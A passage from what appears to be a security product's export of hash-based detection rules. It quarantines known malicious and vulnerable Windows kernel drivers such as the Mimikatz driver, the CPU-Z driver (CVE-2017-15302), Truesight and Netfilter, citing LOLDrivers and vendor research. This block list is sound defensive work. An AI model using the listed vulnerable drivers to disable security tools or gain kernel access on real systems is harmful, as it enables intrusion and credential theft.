+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.469776Z",
+ "creation_date": "2026-03-23T11:45:30.469780Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.469789Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3d73996901d2bfac9999a55723cb57ef5bde1e9a73070979df69f1f1fa8782c1",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "727463a2-1edc-504a-8bb8-e3d8be8f7c7a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.462519Z",
+ "creation_date": "2026-03-23T11:45:30.462522Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.462531Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "be25688313f29d7e62c996572825c33f3dcdda373ec235efe552aeb2219990bb",
+ "comment": "Malicious Kernel Driver (aka mimikatz.sys) [https://www.loldrivers.io/drivers/14556074-b235-4378-b356-f58721629d72/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7276a919-f948-5c59-aa57-d17d1f6bf5fe",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.473154Z",
+ "creation_date": "2026-03-23T11:45:30.473158Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.473167Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "11a4b08e70ebc25a1d4c35ed0f8ef576c1424c52b580115b26149bd224ffc768",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "727a8477-2588-592b-91a5-cbe1586b1704",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610706Z",
+ "creation_date": "2026-03-23T11:45:29.610708Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610714Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a072197177aad26c31960694e38e2cae85afbab070929e67e331b99d3a418cf4",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "727c2643-8669-5189-85b0-29713dec87da",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.828185Z",
+ "creation_date": "2026-03-23T11:45:31.828187Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.828192Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "42b1ed800666677389698c484d15b6ca791393636b27a5111c1e34b5de11b462",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "727c34d7-8c9f-5410-b3bc-ab2f53639a11",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.815880Z",
+ "creation_date": "2026-03-23T11:45:31.815882Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.815888Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b1e4afb828ebe4b942a8e6a25aee656978505014c66e75f8a337c564392ef666",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "728bfa36-9839-5e1d-b6fb-6623911c4548",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.458137Z",
+ "creation_date": "2026-03-23T11:45:30.458140Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.458149Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5a661e26cfe5d8dedf8c9644129039cfa40aebb448895187b96a8b7441d52aaa",
+ "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "729271a8-b91e-52aa-bf62-29b9d8258387",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.498632Z",
+ "creation_date": "2026-03-23T11:45:31.498635Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.498643Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "412144f010eb05a990869c6ff36e7ddc1da7655a627dd61b3b524c19e46c7f12",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "729ba945-2635-5f7c-85ac-361586b252a6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982032Z",
+ "creation_date": "2026-03-23T11:45:29.982034Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982040Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c2d209ed240027608003f8d32b621f8baaf5601aaf348e64269e4457a594c7c3",
+ "comment": "Vulnerable Kernel Driver (aka PCHunter.sys) [https://www.loldrivers.io/drivers/a261cd64-0d04-4bf5-ad73-f3bb96bf83cf/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "72a35022-1f84-560d-b2c3-fb64df534ae6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984338Z",
+ "creation_date": "2026-03-23T11:45:29.984340Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984345Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f581decc2888ef27ee1ea85ea23bbb5fb2fe6a554266ff5a1476acd1d29d53af",
+ "comment": "Vulnerable Kernel Driver (aka inpoutx64.sys) [https://www.loldrivers.io/drivers/91ff1575-9ff2-46fd-8bfe-0bb3e3457b7f/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "72aac524-22a4-5d1f-90ec-ab810689f95d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.453695Z",
+ "creation_date": "2026-03-23T11:45:30.453699Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.453707Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f2cf5653792f32013c6bf8afb2217953708c7040e248ee7a48543e78097c4512",
+ "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "72ad6b69-1af0-567f-bd00-94c10f8bf768",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.463558Z",
+ "creation_date": "2026-03-23T11:45:30.463561Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.463569Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "94c71954ac0b1fd9fa2bd5c506a16302100ba75d9f84f39ee9b333546c714601",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "72afebbf-9154-5489-866e-948e51ca34cd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611044Z",
+ "creation_date": "2026-03-23T11:45:29.611046Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611052Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6045d564286f00fc1efedd25ffd22ecb7eaf2b3a6c778e392319380c77e45658",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "72b8909f-768c-5a1a-a321-edbd592898d2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145182Z",
+ "creation_date": "2026-03-23T11:45:31.145184Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145190Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bce6677edd89a2cb72b1c81629be195a6d53efda931d4de08cb3c3feda90cda8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "72c1cca8-fb1d-5567-aac7-057b3b5797fc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.469427Z",
+ "creation_date": "2026-03-23T11:45:30.469430Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.469439Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c24d0fa3ec5fae870fb0a4e38943d396929d78165354bae56ae5730eb4d062e1",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "72c90592-7188-5fc0-8727-bbcf438d87c2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.145488Z",
+ "creation_date": "2026-03-23T11:45:32.145491Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.145496Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "628c559f9f5de53cad74bc1f0c489bbe1aa5ef5672f47f73c0bfff1fcf98faca",
+ "comment": "Malicious Kernel Driver (aka driver_4fc254af.sys) [https://www.loldrivers.io/drivers/85335187-dae0-4f06-acea-209efaf74973/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "72de97b8-155e-51fe-84c3-d493fb200f4f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605430Z",
+ "creation_date": "2026-03-23T11:45:29.605432Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605438Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "440883cd9d6a76db5e53517d0ec7fe13d5a50d2f6a7f91ecfc863bc3490e4f5c",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "72e67650-995a-5488-b184-cad2a82ff6c3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.480227Z",
+ "creation_date": "2026-03-23T11:45:30.480229Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480234Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ae73dd357e5950face9c956570088f334d18464cd49f00c56420e3d6ff47e8dc",
+ "comment": "Vulnerable Kernel Driver (aka GEDevDrvSYS.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "72f131e6-fc37-5b83-9b2b-3cb5a3a479d6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826710Z",
+ "creation_date": "2026-03-23T11:45:30.826712Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.826718Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7be4d4fe36fc8d9cb95f9b5a9cacc6387c1cb3e7f3e0774cd1713adbe25585fc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "72fb555d-f5dd-5a3c-8401-f19285b80606",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.967856Z",
+ "creation_date": "2026-03-23T11:45:29.967859Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.967866Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ff284e41b303db67aefcf22328b53712a80552741bdf2707cdc53c4a56db61aa",
+ "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "72fd2e96-a93e-5e91-a732-63f1a02402ad",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.489777Z",
+ "creation_date": "2026-03-23T11:45:31.489780Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.489788Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1153d489159dbfc0f73b382b5fe7a65decb407c5bd660a1d75bacbb0bf480cf0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "730bbf03-ae27-5262-b332-9ec122cf6409",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.821583Z",
+ "creation_date": "2026-03-23T11:45:31.821585Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.821591Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ee3524f84250982770fe9c8b87a03e52559ae6bf0267977b23331c1cd944912f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "731d47d9-a017-5c36-8c12-4343ae84b791",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.459215Z",
+ "creation_date": "2026-03-23T11:45:30.459218Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.459227Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
